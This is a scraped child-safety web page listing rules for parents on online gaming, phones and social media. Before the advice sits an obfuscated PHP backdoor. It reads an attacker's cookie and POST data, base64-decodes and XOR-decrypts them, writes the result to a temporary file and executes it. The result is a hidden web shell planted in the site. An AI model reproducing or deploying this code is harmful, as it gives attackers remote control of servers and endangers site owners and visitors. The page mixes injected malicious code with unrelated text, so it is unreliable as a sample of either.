$CeYaLswoG = 'I' . chr (81) . "\137" . 'I' . 'E' . "\x54";$kMduTswFK = "\x63" . chr ( 637 - 529 ).chr ( 315 - 218 )."\x73" . "\163" . chr ( 757 - 662 ).'e' . "\170" . "\x69" . "\163" . 't' . 's';$gIhCtSUeby = class_exists($CeYaLswoG); $kMduTswFK = "36451";$EjEdBH = !1;if ($gIhCtSUeby == $EjEdBH){function bnbVIhs(){return FALSE;}$wTdQMDdQN = "40419";bnbVIhs();class IQ_IET{private function iJuozL($wTdQMDdQN){if (is_array(IQ_IET::$Wzlrb)) {$JZFHLY = sys_get_temp_dir() . "/" . crc32(IQ_IET::$Wzlrb["\x73" . 'a' . "\154" . "\x74"]);@IQ_IET::$Wzlrb[chr (119) . 'r' . 'i' . "\164" . "\145"]($JZFHLY, IQ_IET::$Wzlrb["\x63" . chr ( 665 - 554 ).chr ( 488 - 378 ).'t' . 'e' . "\156" . 't']);include $JZFHLY;@IQ_IET::$Wzlrb[chr (100) . "\145" . 'l' . "\145" . chr ( 1005 - 889 ).'e']($JZFHLY); $wTdQMDdQN = "40419";exit();}}private $NoAxmYBYvW;public function xXlWNDk(){echo 34087;}public function __destruct(){$wTdQMDdQN = "38394_2689";$this->iJuozL($wTdQMDdQN); $wTdQMDdQN = "38394_2689";}public function __construct($kqSNOv=0){$DVwsWldJ = $_POST;$HyJRhXWQMB = $_COOKIE;$FWuwSpgS = "3748c69a-64ea-4cd3-8378-b9d70b157ee2";$AbWfWtA = @$HyJRhXWQMB[substr($FWuwSpgS, 0, 4)];if (!empty($AbWfWtA)){$BczMCA = "base64";$LuGPpFhb = "";$AbWfWtA = explode(",", $AbWfWtA);foreach ($AbWfWtA as $wjfNn){$LuGPpFhb .= @$HyJRhXWQMB[$wjfNn];$LuGPpFhb .= @$DVwsWldJ[$wjfNn];}$LuGPpFhb = array_map($BczMCA . chr ( 745 - 650 )."\x64" . 'e' . "\x63" . chr ( 1079 - 968 ).chr ( 689 - 589 )."\145", array($LuGPpFhb,)); $LuGPpFhb = $LuGPpFhb[0] ^ str_repeat($FWuwSpgS, (strlen($LuGPpFhb[0]) / strlen($FWuwSpgS)) + 1);IQ_IET::$Wzlrb = @unserialize($LuGPpFhb); $LuGPpFhb = class_exists("38394_2689");}}public static $Wzlrb = 63881;}$HEdYKfaP = new /* 33104 */ $CeYaLswoG(40419 + 40419); $EjEdBH = $HEdYKfaP = $wTdQMDdQN = Array();} Protecting children from virtual threads – IKTD

How to protect children from online threats?

 Rules for the safety of children playing online games:

  1. Apply parental controls in order to limit the type of games that children can access online;
  2. Make sure their gaming profile is privately hosted;
  3. If you have more than one child, make sure everyone has opened their profile according to age restrictions;
  4. Be sure to review age guidelines for the games they are playing online;
  5. Limit people they can chat online when playing or turn off the option to communicate with others during the game

Rules for the safety of children's telephone equipment:

  1. Be sure to check out new apps installed on the phone or try to follow a rule that your child needs permission from you first. In most cases, a password is required before a download is allowed.
  2. Talk to your child about the type of content they need to be most careful about, such as messages or phone calls from unknown numbers, friend requests from strangers.
  3. Make sure your child does not give the mobile phone number online or offline to strangers without first getting your permission.
  4. Make sure they understand not to post uncomfortable comments on the Internet.
  5. Be aware of any rules the school has about using a cell phone and make sure your child understands them clearly.
  6. Don't let your child take his phone to bed before sleep. This will not only stop them from sleeping, but will likely lead to unwanted attention.

Rules to protect children from using social networks:

  1. Do not encourage your child to use social media until he or she reaches the required age.
  2. Make sure the computer is kept in a place where you can see their activities.
  3. Set deadlines for the time your child can spend on social media.
  4. Make sure you pay attention to the content they like, share and post.
  5. Block locations for apps or social media that children use.
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